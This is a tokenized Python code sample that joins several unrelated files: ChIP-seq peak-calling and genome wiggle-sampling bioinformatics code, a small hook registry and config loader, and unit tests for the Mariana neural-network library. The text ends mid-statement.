write ( "<STR_LIT>" % ( options . d ) ) <EOL> try : <EOL> ofhd_xls . write ( "<STR_LIT>" % '<STR_LIT:U+002C>' . join ( map ( str , peakmodel . alternative_d ) ) ) <EOL> except : <EOL> pass <EOL> if options . nolambda : <EOL> ofhd_xls . write ( "<STR_LIT>" ) <EOL> peakdetect . peaks . write_to_xls ( ofhd_xls , name = options . name ) <EOL> ofhd_xls . close ( ) <EOL> if options . log_pvalue : <EOL> score_column = "<STR_LIT>" <EOL> elif options . log_qvalue : <EOL> score_column = "<STR_LIT>" <EOL> if not options . broad : <EOL> info ( "<STR_LIT>" % ( options . peakNarrowPeak ) ) <EOL> ofhd_bed = open ( options . peakNarrowPeak , "<STR_LIT:w>" ) <EOL> peakdetect . peaks . write_to_narrowPeak ( ofhd_bed , name_prefix = "<STR_LIT>" , name = options . name , score_column = score_column , trackline = options . trackline ) <EOL> ofhd_bed . close ( ) <EOL> info ( "<STR_LIT>" % ( options . summitbed ) ) <EOL> ofhd_summits = open ( options . summitbed , "<STR_LIT:w>" ) <EOL> peakdetect . peaks . write_to_summit_bed ( ofhd_summits , name_prefix = "<STR_LIT>" , name = options . name , <EOL> description = "<STR_LIT>" + strftime ( "<STR_LIT>" ) + "<STR_LIT:)>" , <EOL> score_column = score_column , trackline = options . trackline ) <EOL> ofhd_summits . close ( ) <EOL> else : <EOL> info ( "<STR_LIT>" % ( options . peakBroadPeak ) ) <EOL> ofhd_bed = open ( options . peakBroadPeak , "<STR_LIT:w>" ) <EOL> peakdetect . peaks . write_to_broadPeak ( ofhd_bed , name_prefix = "<STR_LIT>" , name = options . name , description = options . name , trackline = options . trackline ) <EOL> ofhd_bed . close ( ) <EOL> info ( "<STR_LIT>" % ( options . peakGappedPeak ) ) <EOL> ofhd_bed = open ( options . peakGappedPeak , "<STR_LIT:w>" ) <EOL> peakdetect . peaks . write_to_gappedPeak ( ofhd_bed , name_prefix = "<STR_LIT>" , name = options . name , description = options . name , trackline = options . trackline ) <EOL> ofhd_bed . 
close ( ) <EOL> info ( "<STR_LIT>" ) <EOL> def cal_max_dup_tags ( genome_size , tags_number , p = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> return binomial_cdf_inv ( <NUM_LIT:1> - p , tags_number , <NUM_LIT:1.0> / genome_size ) <EOL> def load_frag_files_options ( options ) : <EOL> """<STR_LIT>""" <EOL> options . info ( "<STR_LIT>" ) <EOL> tp = options . parser ( options . tfile [ <NUM_LIT:0> ] , buffer_size = options . buffer_size ) <EOL> treat = tp . build_petrack ( ) <EOL> if len ( options . tfile ) > <NUM_LIT:1> : <EOL> for tfile in options . tfile [ <NUM_LIT:1> : ] : <EOL> tp = options . parser ( tfile , buffer_size = options . buffer_size ) <EOL> treat = tp . append_petrack ( treat ) <EOL> treat . finalize ( ) <EOL> options . tsize = tp . d <EOL> if options . cfile : <EOL> options . info ( "<STR_LIT>" ) <EOL> cp = options . parser ( options . cfile [ <NUM_LIT:0> ] , buffer_size = options . buffer_size ) <EOL> control = cp . build_petrack ( ) <EOL> control_d = cp . d <EOL> if len ( options . cfile ) > <NUM_LIT:1> : <EOL> for cfile in options . cfile [ <NUM_LIT:1> : ] : <EOL> cp = options . parser ( cfile , buffer_size = options . buffer_size ) <EOL> control = cp . append_petrack ( control ) <EOL> control . finalize ( ) <EOL> else : <EOL> control = None <EOL> options . info ( "<STR_LIT>" % options . tsize ) <EOL> if control is not None : <EOL> options . info ( "<STR_LIT>" % control_d ) <EOL> return ( treat , control ) <EOL> def load_tag_files_options ( options ) : <EOL> """<STR_LIT>""" <EOL> options . info ( "<STR_LIT>" ) <EOL> tp = options . parser ( options . tfile [ <NUM_LIT:0> ] , buffer_size = options . buffer_size ) <EOL> if not options . tsize : <EOL> ttsize = tp . tsize ( ) <EOL> options . tsize = ttsize <EOL> treat = tp . build_fwtrack ( ) <EOL> if len ( options . tfile ) > <NUM_LIT:1> : <EOL> for tfile in options . tfile [ <NUM_LIT:1> : ] : <EOL> tp = options . parser ( tfile , buffer_size = options . buffer_size ) <EOL> treat = tp . 
append_fwtrack ( treat ) <EOL> treat . finalize ( ) <EOL> if options . cfile : <EOL> options . info ( "<STR_LIT>" ) <EOL> control = options . parser ( options . cfile [ <NUM_LIT:0> ] , buffer_size = options . buffer_size ) . build_fwtrack ( ) <EOL> if len ( options . cfile ) > <NUM_LIT:1> : <EOL> for cfile in options . cfile [ <NUM_LIT:1> : ] : <EOL> cp = options . parser ( cfile , buffer_size = options . buffer_size ) <EOL> control = cp . append_fwtrack ( control ) <EOL> control . finalize ( ) <EOL> else : <EOL> control = None <EOL> options . info ( "<STR_LIT>" % options . tsize ) <EOL> return ( treat , control ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from array import * <EOL> from bisect import * <EOL> from Cistrome . Assoc . inout import * <EOL> class Sampler : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = '<STR_LIT>' ) : <EOL> self . __name__ = name <EOL> self . standard_chroms = { '<STR_LIT:I>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:M>' : '<STR_LIT>' , '<STR_LIT:X>' : '<STR_LIT>' } <EOL> def sample ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def get_name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __name__ <EOL> def set_name ( self , name ) : <EOL> """<STR_LIT>""" <EOL> self . __name__ = name <EOL> class GenomeSampler ( Sampler ) : <EOL> def __init__ ( self , name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> Sampler . __init__ ( self , name ) <EOL> def sample ( self , wig = None , resolution = <NUM_LIT:100> ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> chroms = wig . get_chroms ( ) <EOL> except AttributeError : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> coordinates = { } <EOL> for chrom in chroms : <EOL> try : <EOL> standardchrom = self . standard_chroms [ chrom ] <EOL> except KeyError : <EOL> standardchrom = chrom <EOL> wigcoord = wig [ chrom ] [ <NUM_LIT:0> ] <EOL> coordinates [ standardchrom ] = [ ] <EOL> for wc in wigcoord : <EOL> coordinate = ( int ( round ( <NUM_LIT:1.0> * wc / resolution ) ) ) * resolution + <NUM_LIT:1> <EOL> if not coordinates [ standardchrom ] or coordinate != coordinates [ standardchrom ] [ - <NUM_LIT:1> ] : <EOL> coordinates [ standardchrom ] . append ( coordinate ) <EOL> return coordinates <EOL> class ChIPSampler ( Sampler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> Sampler . __init__ ( self , name = '<STR_LIT>' ) <EOL> self . 
standard_chroms = { '<STR_LIT:I>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:M>' : '<STR_LIT>' , '<STR_LIT:X>' : '<STR_LIT>' } <EOL> def sample ( self , bed = None , resolution = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> chroms = bed . get_chroms ( ) <EOL> except AttributeError : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> coordinates = { } <EOL> for chrom in chroms : <EOL> try : <EOL> standardchrom = self . standard_chroms [ chrom ] <EOL> except KeyError : <EOL> standardchrom = chrom <EOL> coordinates [ standardchrom ] = [ ] <EOL> ChIP = zip ( bed [ chrom ] [ '<STR_LIT:start>' ] , bed [ chrom ] [ '<STR_LIT:end>' ] , map ( lambda x , y , : ( x + y ) / <NUM_LIT:2> , bed [ chrom ] [ '<STR_LIT:start>' ] , bed [ chrom ] [ '<STR_LIT:end>' ] ) ) <EOL> howmanyChIPs = len ( ChIP ) <EOL> for i in xrange ( <NUM_LIT:0> , howmanyChIPs ) : <EOL> beg , end , center = ChIP [ i ] <EOL> Ns = range ( center , max ( <NUM_LIT:0> , beg - <NUM_LIT:1> ) , - <NUM_LIT:1> * resolution ) <EOL> Ns . reverse ( ) <EOL> Ns += range ( center + resolution , end + <NUM_LIT:1> , resolution ) <EOL> if Ns : coordinates [ standardchrom ] . extend ( Ns ) <EOL> coordinates [ standardchrom ] . sort ( ) <EOL> return coordinates <EOL> class WigSampler ( Sampler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> Sampler . __init__ ( self , name = '<STR_LIT>' ) <EOL> def sample ( self , wig , resolution ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> chroms = wig . get_chroms ( ) <EOL> except AttributeError : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> sampWig = Wig ( ) <EOL> for chrom in chroms : <EOL> try : <EOL> standardchrom = self . standard_chroms [ chrom ] <EOL> except KeyError : <EOL> standardchrom = chrom <EOL> samp = [ array ( '<STR_LIT:l>' , [ ] ) , array ( '<STR_LIT:d>' , [ ] ) ] <EOL> for wc , val in itertools . 
izip ( wig [ chrom ] [ <NUM_LIT:0> ] , wig [ chrom ] [ <NUM_LIT:1> ] ) : <EOL> coordinate = ( int ( round ( <NUM_LIT:1.0> * wc / resolution ) ) ) * resolution + <NUM_LIT:1> <EOL> if len ( samp [ <NUM_LIT:0> ] ) == <NUM_LIT:0> : <EOL> samp [ <NUM_LIT:0> ] . append ( coordinate ) <EOL> samp [ <NUM_LIT:1> ] . append ( val ) <EOL> continue <EOL> if coordinate != samp [ <NUM_LIT:0> ] [ - <NUM_LIT:1> ] : <EOL> samp [ <NUM_LIT:0> ] . append ( coordinate ) <EOL> samp [ <NUM_LIT:1> ] . append ( val ) <EOL> if samp [ <NUM_LIT:0> ] : sampWig . wig [ standardchrom ] = samp <EOL> return sampWig <EOL> class WigSamplerFast ( Sampler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> Sampler . __init__ ( self , name = '<STR_LIT>' ) <EOL> def sample ( self , wig , resolution ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> chroms = wig . get_chroms ( ) <EOL> except AttributeError : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> sampWig = Wig ( ) <EOL> for chrom in chroms : <EOL> try : <EOL> standardchrom = self . standard_chroms [ chrom ] <EOL> except KeyError : <EOL> standardchrom = chrom <EOL> try : <EOL> start = wig [ chrom ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> end = wig [ chrom ] [ <NUM_LIT:0> ] [ - <NUM_LIT:1> ] <EOL> except IndexError : <EOL> continue <EOL> samp = [ array ( '<STR_LIT:l>' , [ ] ) , array ( '<STR_LIT:d>' , [ ] ) ] <EOL> cor = wig [ chrom ] [ <NUM_LIT:0> ] <EOL> val = wig [ chrom ] [ <NUM_LIT:1> ] <EOL> init = <NUM_LIT:0> <EOL> prev = - <NUM_LIT:1000> <EOL> for sc in xrange ( start , end , resolution ) : <EOL> gotya = bisect_left ( cor [ init : ] , sc ) <EOL> if prev == ( init + gotya ) : continue <EOL> else : prev = ( init + gotya ) <EOL> try : <EOL> samp [ <NUM_LIT:0> ] . append ( cor [ init + gotya ] ) <EOL> samp [ <NUM_LIT:1> ] . append ( val [ init + gotya ] ) <EOL> init += gotya <EOL> except IndexError : <EOL> continue <EOL> if samp [ <NUM_LIT:0> ] : sampWig . 
wig [ standardchrom ] = samp <EOL> return sampWig <EOL> def fillupwig ( wig , resolution , fillupval = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> fillupWig = Wig ( ) <EOL> for chrom in wig . get_chroms ( ) : <EOL> if len ( wig [ chrom ] [ <NUM_LIT:0> ] ) == <NUM_LIT:0> or len ( wig [ chrom ] [ <NUM_LIT:0> ] ) == <NUM_LIT:1> : <EOL> fillupWig [ chrom ] = wig [ chrom ] [ : ] <EOL> break <EOL> cs = wig [ chrom ] [ <NUM_LIT:0> ] <EOL> vs = wig [ chrom ] [ <NUM_LIT:1> ] <EOL> ncs = [ cs [ <NUM_LIT:0> ] ] <EOL> nvs = [ vs [ <NUM_LIT:0> ] ] <EOL> pc = cs [ <NUM_LIT:0> ] <EOL> pv = vs [ <NUM_LIT:0> ] <EOL> for c , v in itertools . izip ( cs [ <NUM_LIT:1> : ] , vs [ <NUM_LIT:1> : ] ) : <EOL> if c - pc > resolution : <EOL> a = range ( pc + resolution , c , resolution ) <EOL> ncs += a <EOL> nvs += [ <NUM_LIT:0.0> ] * len ( a ) <EOL> else : <EOL> ncs . append ( c ) <EOL> nvs . append ( v ) <EOL> pc = c <EOL> pv = v <EOL> fillupWig . wig [ chrom ] = [ array ( '<STR_LIT:l>' , ncs ) , array ( '<STR_LIT:d>' , nvs ) ] <EOL> return fillupWig </s>
<s> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> import re <EOL> import logging <EOL> from optparse import OptionParser <EOL> from taolib . CoreLib . Parser import * <EOL> from taolib . CoreLib . BasicStat . Prob import normal_cdf_inv <EOL> logging . basicConfig ( level = <NUM_LIT:20> , <EOL> format = '<STR_LIT>' , <EOL> datefmt = '<STR_LIT>' , <EOL> stream = sys . stderr , <EOL> filemode = "<STR_LIT:w>" <EOL> ) <EOL> error = logging . critical <EOL> warn = logging . warning <EOL> debug = logging . debug <EOL> info = logging . info <EOL> def main ( ) : <EOL> usage = "<STR_LIT>" <EOL> description = "<STR_LIT>" <EOL> optparser = OptionParser ( version = "<STR_LIT>" , description = description , usage = usage , add_help_option = False ) <EOL> optparser . add_option ( "<STR_LIT>" , "<STR_LIT>" , action = "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> optparser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> optparser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> optparser . add_option ( "<STR_LIT:-c>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:float>" , <EOL> help = "<STR_LIT>" , default = <NUM_LIT> ) <EOL> optparser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" , default = <NUM_LIT> ) <EOL> optparser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" , default = <NUM_LIT:50> ) <EOL> optparser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , default = True ) <EOL> optparser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , default = True ) <EOL> optparser . 
add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:int>" , default = <NUM_LIT:10> , <EOL> help = "<STR_LIT>" ) <EOL> ( options , args ) = optparser . parse_args ( ) <EOL> if not options . wfile or not options . bfile or not options . cutoff : <EOL> optparser . print_help ( ) <EOL> sys . exit ( ) <EOL> f = options . wfile <EOL> if not os . path . isfile ( f ) : <EOL> error ( "<STR_LIT>" % f ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> fhd = open ( f ) <EOL> except : <EOL> error ( "<STR_LIT>" % f ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> bfhd = open ( options . bfile , "<STR_LIT:w>" ) <EOL> except : <EOL> error ( "<STR_LIT>" % options . bfile ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> info ( "<STR_LIT>" ) <EOL> wio = WiggleIO . WiggleIO ( fhd ) <EOL> info ( "<STR_LIT>" ) <EOL> wtrack = wio . build_wigtrack ( ) <EOL> if options . normalize : <EOL> info ( "<STR_LIT>" ) <EOL> ( sum_v , max_v , min_v , mean_v , std_v ) = wtrack . normalize ( null = options . nullmodel , sample_percent = options . samplepercent ) <EOL> if options . nullmodel : <EOL> info ( "<STR_LIT>" ) <EOL> info ( "<STR_LIT>" % mean_v ) <EOL> info ( "<STR_LIT>" % std_v ) <EOL> info ( "<STR_LIT>" ) <EOL> else : <EOL> info ( "<STR_LIT>" ) <EOL> info ( "<STR_LIT>" % mean_v ) <EOL> info ( "<STR_LIT>" % std_v ) <EOL> info ( "<STR_LIT>" ) <EOL> if options . nullmodel : <EOL> ( sum_v , max_v , min_v , mean_v , std_v ) = wtrack . null_model_summary ( sample = options . samplepercent ) <EOL> else : <EOL> ( sum_v , max_v , min_v , mean_v , std_v ) = wtrack . summary ( ) <EOL> info ( "<STR_LIT>" % mean_v ) <EOL> info ( "<STR_LIT>" % std_v ) <EOL> info ( "<STR_LIT>" ) <EOL> scorecutoff = normal_cdf_inv ( options . cutoff , mu = mean_v , sigma2 = std_v , lower = False ) <EOL> info ( "<STR_LIT>" % scorecutoff ) <EOL> info ( "<STR_LIT>" ) <EOL> wpeaks = wtrack . call_peaks ( cutoff = scorecutoff , min_length = options . minlen , max_gap = options . 
maxgap ) <EOL> info ( "<STR_LIT>" ) <EOL> bfhd . write ( wpeaks . tobed ( ) ) <EOL> bfhd . close ( ) <EOL> info ( "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> try : <EOL> main ( ) <EOL> except KeyboardInterrupt : <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:0> ) </s>
<s> hooks = { <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> } <EOL> class register_hook ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , event ) : <EOL> self . event = event <EOL> def __call__ ( self , f ) : <EOL> names = [ '<STR_LIT>' . format ( func . __module__ , func . func_name ) for func in hooks [ self . event ] ] <EOL> if '<STR_LIT>' . format ( f . __module__ , f . func_name ) not in names : <EOL> hooks [ self . event ] . append ( f ) <EOL> return f </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> CONFIG_IDENTIFIER = os . getenv ( "<STR_LIT>" ) <EOL> from flyingcircus . config . base import * <EOL> overrides = __import__ ( <EOL> "<STR_LIT>" + CONFIG_IDENTIFIER , <EOL> globals ( ) , <EOL> locals ( ) , <EOL> [ "<STR_LIT>" ] <EOL> ) <EOL> for attribute in dir ( overrides ) : <EOL> if attribute . isupper ( ) : <EOL> globals ( ) [ attribute ] = getattr ( overrides , attribute ) </s>
<s> import unittest <EOL> import Mariana . layers as ML <EOL> import Mariana . initializations as MI <EOL> import Mariana . costs as MC <EOL> import Mariana . regularizations as MR <EOL> import Mariana . scenari as MS <EOL> import Mariana . activations as MA <EOL> import theano . tensor as tt <EOL> import numpy <EOL> class MLPTests ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . xor_ins = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> ] <EOL> self . xor_outs = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ] <EOL> def tearDown ( self ) : <EOL> pass <EOL> def trainMLP_xor ( self ) : <EOL> ls = MS . GradientDescent ( lr = <NUM_LIT:0.1> ) <EOL> cost = MC . NegativeLogLikelihood ( ) <EOL> i = ML . Input ( <NUM_LIT:2> , '<STR_LIT>' ) <EOL> h = ML . Hidden ( <NUM_LIT:10> , activation = MA . ReLU ( ) , regularizations = [ MR . L1 ( <NUM_LIT:0> ) , MR . L2 ( <NUM_LIT:0> ) ] , name = "<STR_LIT>" ) <EOL> o = ML . SoftmaxClassifier ( <NUM_LIT:2> , learningScenario = ls , costObject = cost , name = "<STR_LIT>" ) <EOL> mlp = i > h > o <EOL> self . xor_ins = numpy . array ( self . xor_ins ) <EOL> self . xor_outs = numpy . array ( self . xor_outs ) <EOL> for i in xrange ( <NUM_LIT:1000> ) : <EOL> mlp . train ( o , inp = self . xor_ins , targets = self . xor_outs ) <EOL> return mlp <EOL> def test_xor ( self ) : <EOL> mlp = self . trainMLP_xor ( ) <EOL> o = mlp . outputs . values ( ) [ <NUM_LIT:0> ] <EOL> pa = mlp . predictionAccuracy ( o , inp = self . xor_ins , targets = self . xor_outs ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( pa , <NUM_LIT:1> ) <EOL> pc = mlp . classificationAccuracy ( o , inp = self . xor_ins , targets = self . xor_outs ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( pc , <NUM_LIT:1> ) <EOL> self . assertEqual ( mlp . classify ( o , inp = [ self . xor_ins [ <NUM_LIT:0> ] ] ) [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> self . 
assertEqual ( mlp . classify ( o , inp = [ self . xor_ins [ <NUM_LIT:1> ] ] ) [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( mlp . classify ( o , inp = [ self . xor_ins [ <NUM_LIT:2> ] ] ) [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( mlp . classify ( o , inp = [ self . xor_ins [ <NUM_LIT:3> ] ] ) [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> def test_save_load_pickle ( self ) : <EOL> import cPickle , os <EOL> import Mariana . network as MN <EOL> mlp = self . trainMLP_xor ( ) <EOL> mlp . save ( "<STR_LIT>" ) <EOL> mlp2 = MN . loadModel ( "<STR_LIT>" ) <EOL> o = mlp . outputs . values ( ) [ <NUM_LIT:0> ] <EOL> o2 = mlp2 . outputs . values ( ) [ <NUM_LIT:0> ] <EOL> for i in xrange ( len ( self . xor_ins ) ) : <EOL> v1 = mlp . propagate ( o , inp = [ self . xor_ins [ i ] ] ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> v2 = mlp2 . propagate ( o2 , inp = [ self . xor_ins [ i ] ] ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> for j in xrange ( len ( v1 ) ) : <EOL> self . assertEqual ( v1 [ j ] , v2 [ j ] ) <EOL> os . remove ( '<STR_LIT>' ) <EOL> def test_ae ( self ) : <EOL> data = [ ] <EOL> for i in xrange ( <NUM_LIT:8> ) : <EOL> zeros = numpy . zeros ( <NUM_LIT:8> ) <EOL> zeros [ i ] = <NUM_LIT:1> <EOL> data . append ( zeros ) <EOL> ls = MS . GradientDescent ( lr = <NUM_LIT:0.1> ) <EOL> cost = MC . MeanSquaredError ( ) <EOL> i = ML . Input ( <NUM_LIT:8> , name = '<STR_LIT>' ) <EOL> h = ML . Hidden ( <NUM_LIT:3> , activation = MA . ReLU ( ) , name = "<STR_LIT>" ) <EOL> o = ML . Regression ( <NUM_LIT:8> , activation = MA . ReLU ( ) , learningScenario = ls , costObject = cost , name = "<STR_LIT>" ) <EOL> ae = i > h > o <EOL> miniBatchSize = <NUM_LIT:2> <EOL> for e in xrange ( <NUM_LIT> ) : <EOL> for i in xrange ( <NUM_LIT:0> , len ( data ) , miniBatchSize ) : <EOL> ae . train ( o , inp = data [ i : i + miniBatchSize ] , targets = data [ i : i + miniBatchSize ] ) <EOL> res = ae . 
propagate ( o , inp = data ) [ <NUM_LIT:0> ] <EOL> for i in xrange ( len ( res ) ) : <EOL> self . assertEqual ( numpy . argmax ( data [ i ] ) , numpy . argmax ( res [ i ] ) ) <EOL> def test_composite ( self ) : <EOL> ls = MS . GradientDescent ( lr = <NUM_LIT:0.1> ) <EOL> cost = MC . NegativeLogLikelihood ( ) <EOL> inp = ML . Input ( <NUM_LIT:2> , '<STR_LIT>' ) <EOL> h1 = ML . Hidden ( <NUM_LIT:5> , activation = MA . Tanh ( ) , name = "<STR_LIT>" ) <EOL> h2 = ML . Hidden ( <NUM_LIT:5> , activation = MA . Tanh ( ) , name = "<STR_LIT>" ) <EOL> o = ML . SoftmaxClassifier ( <NUM_LIT:2> , learningScenario = ls , costObject = cost , name = "<STR_LIT>" ) <EOL> c = ML . Composite ( name = "<STR_LIT>" ) <EOL> inp > h1 > c <EOL> inp > h2 > c <EOL> mlp = c > o <EOL> self . xor_ins = numpy . array ( self . xor_ins ) <EOL> self . xor_outs = numpy . array ( self . xor_outs ) <EOL> for i in xrange ( <NUM_LIT> ) : <EOL> ii = i % len ( self . xor_ins ) <EOL> mlp . train ( o , inp = [ self . xor_ins [ ii ] ] , targets = [ self . xor_outs [ ii ] ] ) <EOL> self . assertEqual ( mlp . predict ( o , inp = [ self . xor_ins [ <NUM_LIT:0> ] ] ) [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> self . assertEqual ( mlp . predict ( o , inp = [ self . xor_ins [ <NUM_LIT:1> ] ] ) [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( mlp . predict ( o , inp = [ self . xor_ins [ <NUM_LIT:2> ] ] ) [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( mlp . predict ( o , inp = [ self . xor_ins [ <NUM_LIT:3> ] ] ) [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> def test_embedding ( self ) : <EOL> """<STR_LIT>""" <EOL> data = [ [ <NUM_LIT:0> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] , [ <NUM_LIT:4> ] , [ <NUM_LIT:5> ] ] <EOL> targets = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> ls = MS . GradientDescent ( lr = <NUM_LIT:0.5> ) <EOL> cost = MC . NegativeLogLikelihood ( ) <EOL> emb = ML . 
Embedding ( <NUM_LIT:1> , <NUM_LIT:2> , len ( data ) , learningScenario = ls , name = "<STR_LIT>" ) <EOL> o = ML . SoftmaxClassifier ( <NUM_LIT:2> , learningScenario = MS . Fixed ( ) , costObject = cost , name = "<STR_LIT>" ) <EOL> net = emb > o <EOL> miniBatchSize = <NUM_LIT:2> <EOL> for i in xrange ( <NUM_LIT> ) : <EOL> for i in xrange ( <NUM_LIT:0> , len ( data ) , miniBatchSize ) : <EOL> net . train ( o , emb = data [ i : i + miniBatchSize ] , targets = targets [ i : i + miniBatchSize ] ) <EOL> embeddings = emb . getEmbeddings ( ) <EOL> for i in xrange ( <NUM_LIT:0> , len ( data ) / <NUM_LIT:2> ) : <EOL> v = numpy . dot ( embeddings [ i ] , embeddings [ i + len ( data ) / <NUM_LIT:2> ] ) <EOL> self . assertTrue ( v < - <NUM_LIT:1> ) <EOL> def test_conv ( self ) : <EOL> import Mariana . convolution as MCONV <EOL> import theano <EOL> def getModel ( inpSize , filterWidth ) : <EOL> ls = MS . GradientDescent ( lr = <NUM_LIT:0.5> ) <EOL> cost = MC . NegativeLogLikelihood ( ) <EOL> pooler = MCONV . MaxPooling2D ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> i = ML . Input ( inpSize , name = '<STR_LIT>' ) <EOL> ichan = MCONV . InputChanneler ( <NUM_LIT:1> , inpSize , name = '<STR_LIT>' ) <EOL> c1 = MCONV . Convolution2D ( <EOL> nbFilters = <NUM_LIT:5> , <EOL> filterHeight = <NUM_LIT:1> , <EOL> filterWidth = filterWidth , <EOL> activation = MA . ReLU ( ) , <EOL> pooler = pooler , <EOL> name = "<STR_LIT>" <EOL> ) <EOL> c2 = MCONV . Convolution2D ( <EOL> nbFilters = <NUM_LIT:10> , <EOL> filterHeight = <NUM_LIT:1> , <EOL> filterWidth = filterWidth , <EOL> activation = MA . ReLU ( ) , <EOL> pooler = pooler , <EOL> name = "<STR_LIT>" <EOL> ) <EOL> f = MCONV . Flatten ( name = "<STR_LIT>" ) <EOL> h = ML . Hidden ( <NUM_LIT:5> , activation = MA . ReLU ( ) , decorators = [ ] , regularizations = [ ] , name = "<STR_LIT>" ) <EOL> o = ML . 
SoftmaxClassifier ( <NUM_LIT:2> , decorators = [ ] , learningScenario = ls , costObject = cost , name = "<STR_LIT>" , regularizations = [ ] ) <EOL> model = i > ichan > c1 > c2 > f > h > o <EOL> return model <EOL> def makeDataset ( nbExamples , size , patternSize ) : <EOL> data = numpy . random . randn ( nbExamples , size ) . astype ( theano . config . floatX ) <EOL> data = data / numpy . sum ( data ) <EOL> pattern = numpy . ones ( patternSize ) <EOL> targets = [ ] <EOL> for i in xrange ( len ( data ) ) : <EOL> if i % <NUM_LIT:2> == <NUM_LIT:0> : <EOL> start = numpy . random . randint ( <NUM_LIT:0> , size / <NUM_LIT:2> - patternSize ) <EOL> targets . append ( <NUM_LIT:0> ) <EOL> else : <EOL> start = numpy . random . randint ( size / <NUM_LIT:2> , size - patternSize ) <EOL> targets . append ( <NUM_LIT:1> ) <EOL> data [ i ] [ start : start + patternSize ] = pattern <EOL> targets = numpy . asarray ( targets , dtype = theano . config . floatX ) <EOL> trainData , trainTargets = data , targets <EOL> return ( trainData , trainTargets ) <EOL> examples , targets = makeDataset ( 